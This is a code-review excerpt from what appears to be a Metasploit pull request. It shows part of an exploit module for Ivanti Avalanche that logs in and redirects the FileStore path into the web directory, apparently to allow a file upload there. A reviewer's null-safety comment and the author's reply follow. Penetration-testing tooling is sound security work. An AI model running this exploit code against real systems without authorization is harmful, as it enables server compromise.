modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb

```diff
@@ -0,0 +1,347 @@
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'loginForm' => 'loginForm',
+        'j_idt8' => '',
+        'loginField' => datastore['USERNAME'],
+        'passwordField' => datastore['PASSWORD'],
+        'TextCaptchaAnswer' => '',
+        'javax.faces.ViewState' => view_state,
+        'loginTableButton' => 'loginTableButton'
+      }
+    )
+
+    unless res&.code == 302 && res&.headers&.[]('Location')&.include?('inventory.jsf')
+      fail_with(Failure::UnexpectedReply, 'Login failed')
+    end
+  end
+
+  def get_view_state(html)
+    view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text
+
+    view_state
+  end
+
+  def configure_filestore
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.body.include?('FileStore')
+      fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')
+    end
+
+    html = res.get_html_document
+    view_state = get_view_state(html)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from FileStoreConfig page') unless view_state
+
+    @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text
+    fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path
+    print_status("Original FileStore config path: '#{@original_config_path}'")
+
+    # determine drive letter
+    drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)
+    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.> 1
+    drive_letter = drive_letter[1]
+
+    new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"
+    print_status("Changing FileStore config path to '#{new_config_path}'")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',
+        'formFileStoreConfig' => 'formFileStoreConfig',
+        'txtUncPath' => new_config_path,
+        'txtVelocityFolder' => '',
+        'javax.faces.ViewState' => view_state
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
+  end
+
+  def get_directory_val(res, dir_name)
+    html = res.get_html_document
+    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
+
+    expand_dir = results.find { |result| result.at('td').text.strip == dir_name }
```

Comment:
```suggestion
    expand_dir = results.find { |result| result&.at('td')&.text&.strip == dir_name }
```

Safe navigation here would be ideal given there is no guarantee the response will contain a `td` element.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/17979/commits/3b2d23eeae49f14033a1b96468a248d4bad7c40e